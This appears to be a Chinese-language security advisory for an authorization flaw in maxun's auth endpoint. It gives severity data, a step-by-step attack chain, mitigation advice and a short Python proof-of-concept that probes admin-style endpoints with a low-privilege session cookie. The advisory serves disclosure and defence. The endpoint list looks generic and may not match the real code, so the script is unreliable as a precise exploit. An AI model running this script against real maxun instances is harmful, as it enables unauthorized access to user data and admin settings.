CVE-2025-15106: getmaxun maxun 身份验证端点不当授权漏洞

漏洞信息

漏洞编号

CVE-2025-15106

漏洞类型

不当授权

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

getmaxun maxun (≤0.0.28)

漏洞概述

CVE-2025-15106是getmaxun maxun项目中的一个中危身份验证绕过漏洞。该漏洞存在于认证端点(Authentication Endpoint)的router.get函数中，具体位置在server/src/routes/auth.ts文件。由于对认证流程的授权检查不充分，攻击者可以利用低权限账号通过远程网络攻击访问本应需要更高权限的操作。漏洞影响版本范围为maxun 0.0.28及之前所有版本。CVSS 3.1基础评分为6.3（中等严重性），攻击向量为网络形式，无需用户交互，攻击复杂度低。漏洞已于2025年12月27日公开披露，公开利用代码已存在，厂商在早期沟通中未作出任何回应。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（访问控制失效）类别。在maxun的auth.ts路由文件中，router.get函数存在授权验证缺陷。攻击者可以通过构造特定的HTTP GET请求，利用低权限账户访问受限的管理功能或用户数据。由于服务端未正确验证请求者的权限级别，导致垂直权限提升。攻击可远程执行，无需目标用户交互。漏洞影响authentication endpoint的攻击链包括：1) 识别目标maxun实例；2) 获取低权限账户或注册新账户；3) 构造针对auth.ts中敏感端点的直接请求；4) 绕过授权检查访问未授权资源；5) 窃取敏感数据或执行未授权操作。

攻击链分析

STEP 1

步骤1

识别目标：发现运行maxun ≤0.0.28版本的Web应用

STEP 2

步骤2

获取访问权限：注册低权限账户或利用现有低权限账号获取session cookie

STEP 3

步骤3

分析认证端点：检查server/src/routes/auth.ts中的router.get函数实现

STEP 4

步骤4

构造恶意请求：针对存在授权缺陷的端点发送直接HTTP GET请求

STEP 5

步骤5

绕过授权检查：由于服务端未正确验证权限级别，攻击者以低权限身份访问高权限资源

STEP 6

步骤6

数据窃取或权限提升：获取敏感用户数据、管理配置信息或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15106 PoC - Improper Authorization in maxun auth endpoint
# Affected: getmaxun maxun <= 0.0.28

import requests
import json

TARGET_URL = "http://target:3000"

def exploit_cve_2025_15106():
    """
    Exploit improper authorization in /auth endpoint
    Replace TARGET_USER_SESSION with valid low-privilege session cookie
    """
    headers = {
        "Cookie": "session=TARGET_USER_SESSION",
        "Content-Type": "application/json"
    }
    
    # Target the vulnerable auth.ts router.get endpoint
    # This endpoint should require higher privileges but doesn't
    vulnerable_endpoints = [
        "/api/auth/users",
        "/api/auth/admin/config",
        "/api/auth/admin/sessions",
        "/api/auth/users/list"
    ]
    
    for endpoint in vulnerable_endpoints:
        url = f"{TARGET_URL}{endpoint}"
        try:
            response = requests.get(url, headers=headers, timeout=10)
            if response.status_code == 200:
                print(f"[+] Vulnerable endpoint found: {endpoint}")
                print(f"[+] Response: {response.text[:500]}")
            elif response.status_code == 403:
                print(f"[-] Protected: {endpoint}")
        except Exception as e:
            print(f"[!] Error testing {endpoint}: {e}")

if __name__ == "__main__":
    print("CVE-2025-15106 PoC - Testing improper authorization in maxun")
    exploit_cve_2025_15106()

影响范围

maxun <= 0.0.28

防御指南

临时缓解措施

如果无法立即升级，可通过配置Web应用防火墙(WAF)限制对/auth端点的访问，对异常访问模式进行监控和告警。同时确保所有API端点都实施最小权限原则，对用户角色和权限进行严格验证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15106
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15106
3 Details https://www.cvedetails.com/cve/CVE-2025-15106/
4 VulDB https://vuldb.com/cve/CVE-2025-15106
5 Link https://gist.github.com/H2u8s/1a0bdb19d5c8c8f4dc72cb49ffe9a22b
6 Link https://vuldb.com/?ctiid.338477
7 Link https://vuldb.com/?id.338477
8 Link https://vuldb.com/?submit.710268